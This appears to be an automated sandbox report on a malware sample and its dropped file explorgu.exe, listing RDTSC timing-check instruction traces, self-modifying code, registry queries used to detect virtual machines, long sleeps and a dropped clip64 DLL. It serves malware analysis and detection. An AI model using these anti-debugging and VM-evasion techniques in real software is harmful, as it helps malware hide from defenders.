Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E508E9 second address: 4E5095C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED74F3E521h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a pushad 0x0000000b call 00007FED74F3E51Ch 0x00000010 pushad 0x00000011 popad 0x00000012 pop eax 0x00000013 pushfd 0x00000014 jmp 00007FED74F3E521h 0x00000019 sbb eax, 43510FB6h 0x0000001f jmp 00007FED74F3E521h 0x00000024 popfd 0x00000025 popad 0x00000026 push eax 0x00000027 jmp 00007FED74F3E521h 0x0000002c xchg eax, esi 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007FED74F3E51Dh 0x00000034 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E5095C second address: 4E50A3F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FED75508877h 0x00000009 xor ecx, 13C54A4Eh 0x0000000f jmp 00007FED75508879h 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007FED75508870h 0x0000001b and ax, B6C8h 0x00000020 jmp 00007FED7550886Bh 0x00000025 popfd 0x00000026 popad 0x00000027 pop edx 0x00000028 pop eax 0x00000029 mov esi, dword ptr [ebp+08h] 0x0000002c pushad 0x0000002d jmp 00007FED75508874h 0x00000032 push esi 0x00000033 movsx edx, ax 0x00000036 pop esi 0x00000037 popad 0x00000038 mov ebx, 00000000h 0x0000003d pushad 0x0000003e jmp 00007FED75508874h 0x00000043 popad 0x00000044 test esi, esi 0x00000046 jmp 00007FED7550886Ch 0x0000004b je 00007FEDE75DE1F1h 0x00000051 jmp 00007FED75508870h 0x00000056 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000005d pushad 0x0000005e pushad 0x0000005f mov bx, cx 0x00000062 mov esi, 14DB41DFh 0x00000067 popad 0x00000068 mov edi, eax 0x0000006a popad 0x0000006b mov ecx, esi 0x0000006d push eax 0x0000006e push edx 0x0000006f jmp 00007FED7550886Dh 0x00000074 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E50A3F second address: 4E50A75 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED74F3E521h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FEDE7013E65h 0x0000000f jmp 00007FED74F3E51Eh 0x00000014 test byte ptr [76FB6968h], 00000002h 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e mov bl, 9Eh 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E50A75 second address: 4E50A7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E50A7B second address: 4E50A7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E50A7F second address: 4E50AF9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED7550886Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jne 00007FEDE75DE18Ah 0x00000011 pushad 0x00000012 pushad 0x00000013 push eax 0x00000014 pop ebx 0x00000015 jmp 00007FED75508876h 0x0000001a popad 0x0000001b call 00007FED75508872h 0x00000020 call 00007FED75508872h 0x00000025 pop eax 0x00000026 pop ebx 0x00000027 popad 0x00000028 mov edx, dword ptr [ebp+0Ch] 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007FED75508878h 0x00000034 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E50AF9 second address: 4E50B08 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED74F3E51Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E50B08 second address: 4E50B0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E50B0E second address: 4E50B12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E50B12 second address: 4E50B16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E50B16 second address: 4E50B25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E50B25 second address: 4E50B29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E50B29 second address: 4E50B42 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED74F3E525h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E50B42 second address: 4E50BA4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FED75508873h 0x00000009 add cl, 0000007Eh 0x0000000c jmp 00007FED75508879h 0x00000011 popfd 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 mov dword ptr [esp], ebx 0x00000018 jmp 00007FED7550886Eh 0x0000001d xchg eax, ebx 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FED75508877h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E50BA4 second address: 4E50C1D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FED74F3E51Fh 0x00000009 and cx, 12EEh 0x0000000e jmp 00007FED74F3E529h 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007FED74F3E520h 0x0000001a add al, 00000068h 0x0000001d jmp 00007FED74F3E51Bh 0x00000022 popfd 0x00000023 popad 0x00000024 pop edx 0x00000025 pop eax 0x00000026 push eax 0x00000027 jmp 00007FED74F3E529h 0x0000002c xchg eax, ebx 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 mov esi, ebx 0x00000032 movsx edi, ax 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E50C1D second address: 4E50C77 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED75508871h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+14h] 0x0000000c pushad 0x0000000d jmp 00007FED7550886Ch 0x00000012 mov cx, DFB1h 0x00000016 popad 0x00000017 push dword ptr [ebp+10h] 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d pushfd 0x0000001e jmp 00007FED75508878h 0x00000023 sub si, ECB8h 0x00000028 jmp 00007FED7550886Bh 0x0000002d popfd 0x0000002e rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E50CDD second address: 4E50CF2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED74F3E521h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E50CF2 second address: 4E50D25 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, dx 0x00000006 call 00007FED75508873h 0x0000000b pop ecx 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FED75508871h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E50D25 second address: 4E50D2B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E50D2B second address: 4E50D31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E50D31 second address: 4E50D68 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED74F3E526h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov esp, ebp 0x0000000d jmp 00007FED74F3E520h 0x00000012 pop ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 mov eax, edi 0x00000018 mov dh, 5Eh 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E50D68 second address: 4E50D6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E50D6E second address: 4E50D72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E60D37 second address: 4E60D9F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 4A554E1Ah 0x00000008 pushfd 0x00000009 jmp 00007FED7550886Bh 0x0000000e adc si, 97BEh 0x00000013 jmp 00007FED75508879h 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c xchg eax, ebp 0x0000001d pushad 0x0000001e movzx esi, bx 0x00000021 call 00007FED75508879h 0x00000026 movzx esi, di 0x00000029 pop ebx 0x0000002a popad 0x0000002b push eax 0x0000002c pushad 0x0000002d mov esi, edi 0x0000002f movsx edi, si 0x00000032 popad 0x00000033 xchg eax, ebp 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 popad 0x0000003a rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E60D9F second address: 4E60DB8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED74F3E525h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E60DB8 second address: 4E60E00 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED75508871h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007FED7550886Eh 0x00000010 pop ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 mov bx, 81F0h 0x00000018 call 00007FED75508879h 0x0000001d pop eax 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E60AB2 second address: 4E60AC5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED74F3E51Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E60AC5 second address: 4E60ACB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E60ACB second address: 4E60ACF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E60ACF second address: 4E60AED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 jmp 00007FED7550886Ch 0x0000000e mov dword ptr [esp], ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E60AED second address: 4E60AF3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4EE06F0 second address: 4EE0764 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED75508874h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FED75508870h 0x0000000f push eax 0x00000010 jmp 00007FED7550886Bh 0x00000015 xchg eax, ebp 0x00000016 jmp 00007FED75508876h 0x0000001b mov ebp, esp 0x0000001d pushad 0x0000001e jmp 00007FED7550886Eh 0x00000023 mov ah, 3Bh 0x00000025 popad 0x00000026 pop ebp 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007FED7550886Fh 0x00000030 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4EE0764 second address: 4EE0768 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4EE0768 second address: 4EE076E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4ED0863 second address: 4ED0869 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4ED0869 second address: 4ED088F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, eax 0x00000005 call 00007FED75508876h 0x0000000a pop esi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push esp 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4ED088F second address: 4ED0893 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4ED0893 second address: 4ED0897 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4ED0897 second address: 4ED089D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4ED089D second address: 4ED08CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED75508872h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FED75508877h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4ED08CF second address: 4ED08E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FED74F3E524h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4ED08E7 second address: 4ED08F7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4ED08F7 second address: 4ED08FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4ED08FB second address: 4ED0901 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4ED0901 second address: 4ED0906 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4ED0906 second address: 4ED0921 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov di, 5002h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FED7550886Bh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4ED0921 second address: 4ED0925 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4ED0925 second address: 4ED092B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4ED092B second address: 4ED093A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FED74F3E51Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4ED07CE second address: 4ED07F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED75508879h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov ax, bx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4ED07F4 second address: 4ED07F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4ED07F8 second address: 4ED07FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4ED07FC second address: 4ED0836 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebp 0x00000008 jmp 00007FED74F3E51Bh 0x0000000d mov ebp, esp 0x0000000f jmp 00007FED74F3E526h 0x00000014 pop ebp 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FED74F3E51Ah 0x0000001e rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4ED0836 second address: 4ED083A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4ED083A second address: 4ED0840 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E700F6 second address: 4E700FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E700FA second address: 4E70100 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E70100 second address: 4E70106 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E70106 second address: 4E7015C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FED74F3E51Fh 0x0000000e xchg eax, ebp 0x0000000f pushad 0x00000010 mov dx, cx 0x00000013 push ecx 0x00000014 mov bx, F952h 0x00000018 pop edi 0x00000019 popad 0x0000001a mov ebp, esp 0x0000001c jmp 00007FED74F3E526h 0x00000021 pop ebp 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007FED74F3E527h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E7015C second address: 4E70163 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4ED0BB0 second address: 4ED0BF9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED74F3E523h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FED74F3E526h 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FED74F3E527h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4ED0BF9 second address: 4ED0C72 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED75508879h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+0Ch] 0x0000000c jmp 00007FED7550886Eh 0x00000011 push dword ptr [ebp+08h] 0x00000014 jmp 00007FED75508870h 0x00000019 push F3EDA717h 0x0000001e jmp 00007FED75508871h 0x00000023 add dword ptr [esp], 0C1358EBh 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d call 00007FED75508873h 0x00000032 pop ecx 0x00000033 movsx edx, cx 0x00000036 popad 0x00000037 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4ED0C72 second address: 4ED0C78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4ED0C78 second address: 4ED0C7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4ED0C9B second address: 4ED0C9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4ED0C9F second address: 4ED0CA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4ED0CA5 second address: 4ED0CB8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov al, A2h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a movzx eax, al 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4ED0CB8 second address: 4ED0CBE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4ED0CBE second address: 4ED0CDA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FED74F3E528h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4ED0CDA second address: 4ED0CDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\wIaKimJFke.exe	Special instruction interceptor: First address: 54BB5F instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\wIaKimJFke.exe	Special instruction interceptor: First address: 54BA89 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\wIaKimJFke.exe	Special instruction interceptor: First address: 6F2A0A instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\wIaKimJFke.exe	Special instruction interceptor: First address: 6F983A instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\wIaKimJFke.exe	Special instruction interceptor: First address: 77998A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Special instruction interceptor: First address: 30BB5F instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Special instruction interceptor: First address: 30BA89 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Special instruction interceptor: First address: 4B2A0A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Special instruction interceptor: First address: 4B983A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Special instruction interceptor: First address: 53998A instructions caused by: Self-modifying code

Contains capabilities to detect virtual machines

Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\Desktop\wIaKimJFke.exe

Code function: 0_2_04ED0C6D rdtsc

0_2_04ED0C6D

Contains long sleeps (>= 3 min)

Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Thread delayed: delay time: 180000			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Window / User API: threadDelayed 1123	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Window / User API: threadDelayed 1032	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Window / User API: threadDelayed 1032	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Window / User API: threadDelayed 1008	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Window / User API: threadDelayed 9994	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4653	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5194	Jump to behavior

Found dropped PE file which has not been started or loaded

Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\clip64[1].dll	Jump to dropped file
